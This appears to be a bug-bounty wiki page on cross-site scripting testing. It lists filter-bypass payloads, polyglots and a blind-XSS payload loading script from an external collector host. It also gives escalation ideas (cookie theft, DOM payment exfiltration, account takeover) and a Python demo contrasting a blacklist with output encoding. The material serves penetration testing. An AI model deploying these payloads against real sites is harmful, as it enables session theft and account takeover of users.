
XSS Testing

Cross-site scripting is high-frequency, chains well with CSRF and IDOR, and is worth testing on every input.

Testing Process

  1. Test basic HTML injection – can you input <h2>, <img>, <table> without filtering?
  2. Check encoding – reflected as &lt;script&gt; or %3Cscript%3E? Test double encoding: %253C, %26lt;
  3. Reverse engineer the filter – blocking complete tags only? Try an unclosed tag: <script src=attacker.com?c=
  4. Test blacklist gaps: <svg>, <%00iframe>, on%0derror, </script/x>, <ScRiPt>
  5. Test every reflected parameter for both reflected and blind XSS
  6. Check WAF behavior – sometimes they only filter parameter values, not names

Filter Bypass Flow

  1. How are non-malicious HTML tags handled? <h2>, <b>
  2. What about incomplete tags? <iframe src=attacker.com/c=
  3. How do they handle encodings? <%00h2>, %0d, %0a, %09
  4. Is it a blacklist of hardcoded strings? Does </script/x> work? <ScRiPt>?
  5. Does the blacklist apply to file uploads too?

Common Bypass Payloads

<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<ScRiPt>alert(1)</ScRiPt>
<%00script>alert(1)</script>
</script/x><script>alert(1)</script>
<iframe src=//attacker.com/c=
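Added example, not from the original page: a hypothetical Python blacklist of the kind the Testing Process and Filter Bypass Flow describe, run against the variants listed above, beside contextual output encoding of the same input. The `BLACKLISTED` strings and `blacklist_filter` are constructed for this demo, and it assumes the URL-decoded value (null byte included) reaches the filter verbatim.

```python
import html
import re
from urllib.parse import unquote

# Constructed blacklist: strips a few exact, well-formed tag strings and
# nothing else. This is the "blacklist of hardcoded strings" pattern above.
BLACKLISTED = ("<script>", "</script>", "<iframe", "<img")


def blacklist_filter(value: str) -> str:
    """Hypothetical server-side filter: remove hard-coded tag strings."""
    for bad in BLACKLISTED:
        value = value.replace(bad, "")
    return value


def escape_for_html(value: str) -> str:
    """Contextual output encoding: neutralise the characters, not strings."""
    return html.escape(value, quote=True)


def tag_survives(fragment: str) -> bool:
    """True if a '<' that can still open a tag remains in the output.

    A handler such as onload= only matters inside a tag, so a surviving
    tag opener is the signal that the output is still interpretable as HTML.
    """
    return re.search(r"<[^\s<>/]", fragment) is not None


# Constructed inputs, mirroring the variants listed on this page.
PAYLOADS = [
    "<script>alert(1)</script>",       # the exact string the list was built for
    "<ScRiPt>alert(1)</ScRiPt>",       # case variation
    "<%00script>alert(1)</script>",    # null byte inside the tag name
    "<svg onload=alert(1)>",           # tag that is simply not on the list
]


def check_filter(payloads):
    """Map each payload to whether a tag survives the blacklist."""
    return {p: tag_survives(blacklist_filter(unquote(p))) for p in payloads}


def check_escape(payloads):
    """Map each payload to whether a tag survives output encoding."""
    return {p: tag_survives(escape_for_html(unquote(p))) for p in payloads}


if __name__ == "__main__":
    for p, survived in check_filter(PAYLOADS).items():
        print(f"blacklist  {'BYPASSED' if survived else 'blocked '}  {p!r}")
    for p, survived in check_escape(PAYLOADS).items():
        print(f"escaping   {'BYPASSED' if survived else 'blocked '}  {p!r}")
```

Only the exact lowercase `<script>` is caught by the blacklist; the case, null-byte and unlisted-tag variants pass through, while escaping neutralises all four because it targets the `<` character rather than a list of strings.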

Polyglot Payloads

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A
" onclick=alert(1)//<button ' onclick=alert(1)//>

Input Vectors Often Missed

  • CSS customization fields (themes, profile colors)
  • Event/meeting name fields
  • Third-party integrations (Facebook import, OAuth name fields)
  • JSON POST body values
  • File upload filenames: photo.jpg<svg onload=confirm()>
  • SWF parameters: onload, allowedDomain, movieplayer, xmlPath, callback
  • Fake/injected parameters: ''?realparam=1&foo=bar'+alert(/XSS/)+'
  • Custom error pages
  • Mobile app signup – different codebase, different filtering

Blind XSS

Use a blind XSS payload that calls back to your server (XSS Hunter, interactsh):

"><script src=https://yourxsshunter.xss.ht></script>

Test in:

  • Support ticket fields
  • Admin-visible fields (name, bio, feedback)
  • Log-visible fields (User-Agent, Referer, X-Forwarded-For)

Escalating XSS

  • Chain with CSRF to perform state-changing actions from victim's browser
  • Steal session cookies if HttpOnly is not set
  • Use XSS to exfiltrate payment info from the DOM
  • XSS combined with an email/password change that requires no re-authentication or second confirmation = account takeover
  • Self-XSS + CSRF = stored XSS affecting other users

zseano/xss.txt · Last modified: by drew